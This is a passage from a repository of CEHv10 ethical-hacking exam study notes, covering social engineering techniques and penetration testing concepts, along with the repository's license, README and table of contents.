- [Spimming \(Spam over Instant Messaging\)](12-social_engineering.md#spimming-spam-over-instant-messaging) 24 | - [Fake Antivirus](12-social_engineering.md#fake-antivirus) 25 | - [Mail Relaying](12-social_engineering.md#mail-relaying) 26 | - [Watering hole](12-social_engineering.md#watering-hole) 27 | - [Baitting attack](12-social_engineering.md#baitting-attack) 28 | - [Mobile-Based Attacks](12-social_engineering.md#mobile-based-attacks) 29 | - [Insider Threats](12-social_engineering.md#insider-threats) 30 | - [Insiders](12-social_engineering.md#insiders) 31 | - [Types of Threats](12-social_engineering.md#types-of-threats) 32 | 33 | ## Social Engineering 34 | 35 | - The art of manipulating a person or group into providing information or a service they would otherwise not have given 36 | 37 | ### Social Engineering Phases 38 | 39 | 1. Research \(dumpster dive, visit websites, tour the company, etc.\) 40 | 2. Select the victim \(identify frustrated employee or other target\) 41 | 3. Develop a relationship 42 | 4. Exploit the relationship \(collect sensitive information\) 43 | 44 | ### Reasons This Works 45 | 46 | - Human nature \(trusting others\) 47 | - Ignorance of social engineering efforts 48 | - Fear \(of consequences of not providing the information\) 49 | - Greed \(promised gain for providing requested information\) 50 | - A sense of moral obligation 51 | 52 | ### Human-Based Attacks 53 | 54 | - Always be pleasant because it gets more information 55 | 56 | #### Impersonation 57 | 58 | - Pretending to be someone you're not 59 | - Can be anything from a help desk person up to an authoritative figure \(FBI agent\) 60 | - Posing as a tech support professional can really quickly gain trust with a person 61 | - **Vishing** Voice or VoIP phishing: an impersonation technique in which attacker uses Voice over IP \(VoIP\) technology to trick individuals into revealing their personal information 62 | 63 | #### Eavesdropping 64 | 65 | - Listening in on conversations about sensitive information 66 | 67 | #### Shoulder Surfing 68 | 69 | - Looking over someone's shoulder to get info 70 | - Can be done long distance with binoculars, etc. 71 | 72 | #### Dumpster Diving 73 | 74 | - Looking for sensitive information in the trash 75 | - Shredded papers can sometimes indicate sensitive info 76 | - Passive activity 77 | 78 | #### Reverse Social Engineering 79 | 80 | - Getting someone to call you and give information 81 | - Often happening with tech support, eg: an email is sent to user stating they need them to call back due to technical issue 82 | - Involved techniques: **Sabotage**, **Marketing**, and **Support** 83 | 84 | #### Piggybacking 85 | 86 | - Attacker pretends that badge is lost and attacker asks someone to hold/open the door, **with consent** of the authorized person 87 | 88 | #### Tailgating 89 | 90 | - Attacker has a fake badge and walks in behind someone who has a valid one, **without consent** of the authorized person 91 | 92 | #### Rubber-hose Attack 93 | 94 | - Extracting secrets from people by use of torture or coercion 95 | 96 | ### Computer-Based Attacks 97 | 98 | - Can begin with sites like Facebook where information about a person is available 99 | 100 | #### Pop-Up Windows 101 | 102 | - Hoax letters: warns the recipients of a non-existent computer virus threat 103 | - Chain letters: offers free gifts 104 | - Instant Chat Messenger: chats via instant chat messages to gather personal information 105 | - Spam Emails 106 | 107 | #### Phishing 108 | 109 | - Crafting an email that appears legitimate but contains links to fake websites or to download malicious content 110 | - **Ways to Avoid Phishing** 111 | - Beware unknown, unexpected or suspicious originators 112 | - Beware of who the email is addressed to 113 | - Verify phone numbers 114 | - Beware bad spelling or grammar 115 | - Always check links 116 | 117 | ##### Spear Phishing 118 | 119 | - Targeting a person or a group with a phishing attack 120 | - Can be more useful because attack can be targeted 121 | 122 | ##### Whaling 123 | 124 | - Going after CEOs or other C-level executives 125 | 126 | ##### Pharming 127 | 128 | - Use of malicious code that redirects a user's traffic 129 | - 2 ways to perform: 130 | - DNS Cache Poisoning 131 | - Host File Modification 132 | 133 | ##### Spimming \(Spam over Instant Messaging\) 134 | 135 | - Using IM as a tool to spread spam 136 | 137 | #### Fake Antivirus 138 | 139 | - Pretending to be an anti-virus but is a malicious tool 140 | - Very prevalent attack 141 | 142 | #### Mail Relaying 143 | 144 | - Bouncing e-mail from internal to external mails servers continuously 145 | - Ensuring that no one knows they sent the spam out to thousands of users at a time 146 | 147 | #### Watering hole 148 | 149 | - The victim is of a particular group \(organization, industry, or region\) 150 | - Attacker guesses or observes which websites the group often uses and infects one or more of them with malware. Eventually, some member of the targeted group becomes infected 151 | - Looking for specific information may only attack users coming from a specific IP address 152 | 153 | #### Baitting attack 154 | 155 | - Attacker leaves malware-infected floppy disks, CD-ROMs, or USB flash drives in locations people will find them, give them legitimate and curiosity-piquing labels, and waits for victims 156 | 157 | ### Mobile-Based Attacks 158 | 159 | - Publishing malicious apps 160 | - Repackaging legitimate apps 161 | - Fake security applications 162 | - **SMiShing**: SMS Phishing 163 | 164 | ### Insider Threats 165 | 166 | #### Insiders 167 | 168 | - Privileged Users: most trusted employees of the company 169 | - Disgruntled Employees: unhappy employees or contract workers 170 | - Terminated Employees 171 | - Accident-Prone Employees: accidentally losing device or sending email to incorrect recipients... which leads to unintentional data disclosure 172 | - Third Parties 173 | - Undertrained Staff: trusted employee becomes an unintentional insider due to lack of cybersecurity training 174 | 175 | #### Types of Threats 176 | 177 | - Malicious insider: disgruntled or terminated employees who steal data or destroy company networks intentionally by injecting malware to corporate network 178 | - Negligent Insider: uneducated on potential security threats, more vulnerable to social engineering attacks 179 | - Professional Insider: most harmful insider, using technical knowledge to identify weakness and vulnerability of company's network and sell confidential information 180 | - Compromised Insider: outsider compromises insider having access to critical assets of an organization 181 | -------------------------------------------------------------------------------- /13-pen_testing.md: -------------------------------------------------------------------------------- 1 | # 13-Pen Testing 2 | 3 | ## Table of Contents 4 | 5 | - [Pen Testing](13-pen_testing.md#pen-testing) 6 | - [Security Audit](13-pen_testing.md#security-audit) 7 | - [Vulnerability Assessment](13-pen_testing.md#vulnerability-assessment) 8 | - [Product-Based Solutions](13-pen_testing.md#product-based-solutions) 9 | - [Service-Based Solutions](13-pen_testing.md#service-based-solutions) 10 | - [Tree-Based Assessment](13-pen_testing.md#tree-based-assessment) 11 | - [Inference-Based Assessment](13-pen_testing.md#inference-based-assessment) 12 | - [Penetration Testing](13-pen_testing.md#penetration-testing) 13 | - [Phases of Pen Testing](13-pen_testing.md#phases-of-pen-testing) 14 | - [Types of Pen Testing](13-pen_testing.md#types-of-pen-testing) 15 | - [Teams](13-pen_testing.md#teams) 16 | - [Automated Testing Tools](13-pen_testing.md#automated-testing-tools) 17 | - [Security Testing Methodology](13-pen_testing.md#security-testing-methodology) 18 | - [Proprietary Methodologies](13-pen_testing.md#proprietary-methodologies) 19 | - [Open-Source and Public Methodologies](13-pen_testing.md#open-source-and-public-methodologies) 20 | 21 | ## Pen Testing 22 | 23 | ### Security Audit 24 | 25 | - Policy and procedure focused 26 | - Tests whether organization is following specific standards and policies 27 | 28 | ### Vulnerability Assessment 29 | 30 | - Scans and tests for vulnerabilities but does **not intentionally exploit them** 31 | 32 | #### Product-Based Solutions 33 | 34 | Product-based solutions are installed in the organization's internal network. They are installed in a private or non-routable space, or the Internet-addressable portion of an organization's network. If they are installed in the private network or, in other words, behind the firewall, they cannot always detect outside attacks. 35 | 36 | #### Service-Based Solutions 37 | 38 | Service-based solutions are offered by third parties, such as auditing or security consulting firms. Some solutions are hosted inside the network; others are hosted outside the network. A drawback of this solution is that attackers can audit the network from outside. 39 | 40 | #### Tree-Based Assessment 41 | 42 | In a tree-based assessment, the auditor selects different strategies for each machine or component of the information system. This approach relies on the administrator to provide a starting shot of intelligence, and then to start scanning continuously without incorporating any information found at the time of scanning. 43 | 44 | #### Inference-Based Assessment 45 | 46 | In an inference-based assessment, scanning starts by building an inventory of protocols found on the machine. After finding a protocol, the scanning process starts to detect which ports are attached to services. After finding services, it selects vulnerabilities on each machine and starts to execute only those relevant tests. 47 | 48 | ### Penetration Testing 49 | 50 | - Looking for vulnerabilities and **actively seeking to exploit them** 51 | - Need to make sure you have a great contract in place to protect you from liability 52 | - Clearly defined, full scale test of security controls 53 | 54 | #### Phases of Pen Testing 55 | 56 | - **Pre-Attack Phase**: reconnaissance and data-gathering 57 | - Planning and preparation: Rule of Engagement \(RoE\) 58 | - Methodology design 59 | - Network information gathering 60 | - **Attack Phase**: attempts to penetrate the network and execute attacks 61 | - Penetrating perimeter 62 | - Acquiring target 63 | - Escalating privileges 64 | - Execution, implantation, retracting 65 | - **Post-Attack Phase**: cleanup to return a system to the pre-attack condition and deliver reports 66 | - Reporting 67 | - Clean-up 68 | - Artifact destruction 69 | 70 | #### Types of Pen Testing 71 | 72 | - **Black Box**: without any knowledge of the system or network 73 | - **White Box**: complete knowledge of the system 74 | - **Gray Box**: some knowledge of the system and/or network 75 | - **External Assessment**: analyzing publicly available information; conducting network scanning, enumeration and testing from the network perimeter 76 | - **Internal Assessment**: performed from within the organization, from various network access points 77 | 78 | #### Teams 79 | 80 | - **Red Team**: attacking 81 | - **Blue Team**: defending 82 | - **Purple Team**: doing both attacking and defending 83 | 84 | #### Automated Testing Tools 85 | 86 | - **Metasploit**: framework for developing and executing code against a remote target machine 87 | - **Core Impact Pro**: best known, all-inclusive automated testing framework, tests everything from web applications and individual systems to network devices and wireless 88 | - **CANVAS**: hundreds of exploits, automated exploitation system and extensive exploit development framework 89 | 90 | ### Security Testing Methodology 91 | 92 | #### Proprietary Methodologies 93 | 94 | - IBM 95 | - McAfee Foundstone 96 | - EC-Council LPT: Licensed Penetration Tester 97 | 98 | #### Open-Source and Public Methodologies 99 | 100 | - OWASP: Open Web Application Security Project 101 | - OSSTMM: Open-Source Security Testing Methodology Manual 102 | - ISSAF: Information System Security Assessment Framework 103 | - NIST: National Institute of Standards and Technology 104 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright 2020 Scott Craig 190 | Modifications Copyright 2020 Kevin Cui 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CEHv10 Study Guide++ 2 | 3 | Forked [CEHv10StudyGuide](https://github.com/scottymcraig/CEHv10StudyGuide) 4 | 5 | Many updates corresponding to CEHv10 courseware 6 | 7 | My personal study notes 8 | 9 | = CEHv10 Study Guide 10 | 11 | | CHAPTER | NAME | LINK | 12 | | :------ | :------------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------------------------- | 13 | | 01 | Essential Knowledge | [](01-essential_knowledge.md) | 14 | | 02 | Reconnaissance and footprinting | [](02-reconnaissance_and_footprinting.md) | 15 | | 03 | Scanning and Enumeration | [](03-scanning_and_enumeration.md) | 16 | | 04 | Sniffing and Evasion | [](04-sniffing_and_evasion.md) | 17 | | 05 | System Hacking | [](05-system_hacking.md) | 18 | | 06 | Web Server and Web Application Hacking | [](06-web_server_and_web_application_hacking.md) | 19 | | 07 | Wireless Network Hacking | [](07-wireless_network_hacking.md) | 20 | | 08 | Mobile and IoT Hacking | [](08-mobile_and_iot_hacking.md) | 21 | | 09 | Security in Cloud Computing | [](09-security_in_cloud_computing.md) | 22 | | 10 | Malware and Other Attacks | [](10-malware_and_other_attacks.md) | 23 | | 11 | Cryptography | [](11-cryptography.md) | 24 | | 12 | Social Engineering | [](12-social_engineering.md) | 25 | | 13 | Pen Testing | [](13-pen_testing.md) | 26 | 27 | Read it on GitBook: [https://kevcui.gitbook.io/cehv10studyguideplusplus](https://kevcui.gitbook.io/cehv10studyguideplusplus) 28 | 29 | --- 30 | 31 | Enjoy your studies! 32 | 33 | --- 34 | 35 | Buy Me A Coffee 36 | -------------------------------------------------------------------------------- /SUMMARY.md: -------------------------------------------------------------------------------- 1 | # Table of contents 2 | 3 | * [CEHv10 Study Guide++](README.md) 4 | * [01-Essential Knowledge](01-essential_knowledge.md) 5 | * [02-Reconnaissance and Footprinting](02-reconnaissance_and_footprinting.md) 6 | * [03-Scanning and Enumeration](03-scanning_and_enumeration.md) 7 | * [04-Sniffing and Evasion](04-sniffing_and_evasion.md) 8 | * [05-System Hacking](05-system_hacking.md) 9 | * [06-Web Server and Web Application Hacking](06-web_server_and_web_application_hacking.md) 10 | * [07-Wireless Network Hacking](07-wireless_network_hacking.md) 11 | * [08-Mobile and IoT Hacking](08-mobile_and_iot_hacking.md) 12 | * [09-Security in Cloud Computing](09-security_in_cloud_computing.md) 13 | * [10-Malware and Other Attacks](10-malware_and_other_attacks.md) 14 | * [11-Cryptography](11-cryptography.md) 15 | * [12-Social Engineering](12-social_engineering.md) 16 | * [13-Pen Testing](13-pen_testing.md) 17 | 18 | --------------------------------------------------------------------------------